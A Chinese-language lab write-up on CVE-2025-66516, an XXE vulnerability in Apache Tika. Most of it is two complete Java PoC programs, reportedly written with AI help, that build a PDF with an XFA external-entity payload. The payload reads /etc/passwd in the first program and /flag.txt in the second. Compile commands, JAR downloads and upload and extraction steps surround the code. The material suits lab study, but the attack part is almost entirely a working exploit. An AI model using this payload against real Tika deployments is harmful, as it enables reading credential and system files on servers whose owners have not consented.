CVE-2025-66516 Apache Tika XXE-靶场记录
https://blog.csdn.net/AKM4180/article/details/155860707
https://github.com/Kai-One001/cve-/blob/main/CVE-2025-66516-xfa-passwd.pdf
复现验证
1、连上靶机后上传从github下载好的文件进行漏洞验证。
由于使用公众号中的poc,无法生成我所需要的恶意pdf(本人太菜),所以使用了ai结合得到的源代码,让ai帮我重新写一份poc,具体步骤如下。
strings CVE-2025-66516-xfa-passwd.pdf | grep -A 5 -B 5 '<!ENTITY'
根据你提供的 PDF 片段(包含 <!ENTITY xxe SYSTEM "file:///etc/passwd"> 和 XFA 结构),以下是完全复现该 payload 的独立 Java PoC 代码,可生成一模一样的 CVE-2025-66516-xfa-passwd.pdf 文件。
import org.apache.pdfbox.cos.COSDictionary;
import org.apache.pdfbox.cos.COSName;
import org.apache.pdfbox.cos.COSStream;
import org.apache.pdfbox.pdmodel.PDDocument;
import org.apache.pdfbox.pdmodel.PDPage;
import org.apache.pdfbox.pdmodel.interactive.form.PDAcroForm;
import java.io.OutputStream;
import java.io.IOException;
public class CVE_2025_66516_XXE {
public static void main(String[] args) throws IOException {
PDDocument doc = new PDDocument();
PDPage page = new PDPage();
doc.addPage(page);
// 创建 AcroForm
PDAcroForm acroForm = new PDAcroForm(doc);
acroForm.setNeedAppearances(true);
doc.getDocumentCatalog().setAcroForm(acroForm);
// 完全匹配你 PDF 中的 XFA payload
String xfaXml =
"<!DOCTYPE xfa [\n" +
" <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n" +
"]>\n" +
"<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n" +
" <xdp:template>\n" +
" <template xmlns=\"http://www.xfa.org/schema/xfa-template/2.8/\">\n" +
" <subform name=\"form1\"><field name=\"field\"/></subform>\n" +
" </template>\n" +
" </xdp:template>\n" +
" <xdp:datasets>\n" +
" <xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\">\n" +
" <xfa:data><root><field>&xxe;</field></root></xfa:data>\n" +
" </xfa:datasets>\n" +
" </xdp:datasets>\n" +
"</xdp:xdp>";
// 写入 COSStream
COSStream xfaStream = doc.getDocument().createCOSStream();
try (OutputStream os = xfaStream.createOutputStream()) {
os.write(xfaXml.getBytes("UTF-8"));
}
// 注入 /XFA 到 AcroForm
COSDictionary acroFormDict = acroForm.getCOSObject();
acroFormDict.setItem(COSName.XFA, xfaStream);
// 保存 PDF
String output = "CVE-2025-66516-xfa-passwd.pdf";
doc.save(output);
doc.close();
System.out.println("[+] Generated: " + output);
}
}
javac -cp "pdfbox-2.0.29.jar:fontbox-2.0.29.jar:commons-logging-1.2.jar:." CVE_2025_66516_XXE.java
java -cp "pdfbox-2.0.29.jar:fontbox-2.0.29.jar:commons-logging-1.2.jar:." CVE_2025_66516_XXE因为靶场已经明确flag文件在根目录下,所以具体的代码如下。
import org.apache.pdfbox.cos.COSDictionary;
import org.apache.pdfbox.cos.COSName;
import org.apache.pdfbox.cos.COSStream;
import org.apache.pdfbox.pdmodel.PDDocument;
import org.apache.pdfbox.pdmodel.PDPage;
import org.apache.pdfbox.pdmodel.interactive.form.PDAcroForm;
import java.io.OutputStream;
import java.io.IOException;
public class Tika_XXE_Exploit {
public static void main(String[] args) throws IOException {
PDDocument doc = new PDDocument();
PDPage page = new PDPage();
doc.addPage(page);
// 创建 AcroForm
PDAcroForm acroForm = new PDAcroForm(doc);
acroForm.setNeedAppearances(true);
doc.getDocumentCatalog().setAcroForm(acroForm);
// 专为 Apache Tika XXE 优化的 payload
// 关键修改:读取 /flag.txt (题目明确说明 flag 位置)
String xfaXml =
"<!DOCTYPE xfa [\n" +
" <!ENTITY xxe SYSTEM \"file:///flag.txt\">\n" + // 精准指向 flag.txt
"]>\n" +
"<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n" +
" <xdp:template>\n" +
" <template xmlns=\"http://www.xfa.org/schema/xfa-template/2.8/\">\n" +
" <subform name=\"form1\"><field name=\"field\"/></subform>\n" +
" </template>\n" +
" </xdp:template>\n" +
" <xdp:datasets>\n" +
" <xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\">\n" +
" <xfa:data><root><field>&xxe;</field></root></xfa:data>\n" +
" </xfa:datasets>\n" +
" </xdp:datasets>\n" +
"</xdp:xdp>";
// 写入 COSStream
COSStream xfaStream = doc.getDocument().createCOSStream();
try (OutputStream os = xfaStream.createOutputStream()) {
os.write(xfaXml.getBytes("UTF-8"));
}
// 注入 /XFA 到 AcroForm
COSDictionary acroFormDict = acroForm.getCOSObject();
acroFormDict.setItem(COSName.XFA, xfaStream);
// 保存 PDF
String output = "tika-xxe-exploit.pdf";
doc.save(output);
doc.close();
System.out.println("\n" + "=".repeat(60));
System.out.println("[+] APACHE TIKA XXE EXPLOIT GENERATED: " + output);
System.out.println("[!] VULNERABILITY: CVE-2025-66516");
System.out.println("[!] TARGET: " + output + " → file:///flag.txt");
System.out.println("[!] UPLOAD INSTRUCTIONS:");
System.out.println("1. Upload " + output + " to the Apache Tika service");
System.out.println("2. DOWNLOAD THE RESPONSE (processed PDF)");
System.out.println("3. Extract flag with:");
System.out.println(" strings response.pdf | grep -a 'CTF{'");
System.out.println("=".repeat(60) + "\n");
// 额外提示(针对这个特定 CVE)
System.out.println("[!] WHY THIS WORKS FOR CVE-2025-66516:");
System.out.println("- Uses minimal XFA structure proven to work with Tika's PDF parser");
System.out.println("- Targets EXACT flag location specified in challenge (/flag.txt)");
System.out.println("- Avoids entity nesting that breaks in Tika's XML parser");
System.out.println("- Matches the structure that successfully read /etc/passwd");
}
}
# 保存代码为 Tika_XXE_Exploit.java
javac -cp "pdfbox-2.0.29.jar:fontbox-2.0.29.jar:commons-logging-1.2.jar:." Tika_XXE_Exploit.java
java -cp "pdfbox-2.0.29.jar:fontbox-2.0.29.jar:commons-logging-1.2.jar:." Tika_XXE_Exploit
# 下载必需 JAR
wget https://repo1.maven.org/maven2/org/apache/pdfbox/pdfbox/2.0.29/pdfbox-2.0.29.jar
wget https://repo1.maven.org/maven2/org/apache/pdfbox/fontbox/2.0.29/fontbox-2.0.29.jar
wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar最终获得上传生成的pdf文件,获得flag.txt
请登录后查看回复内容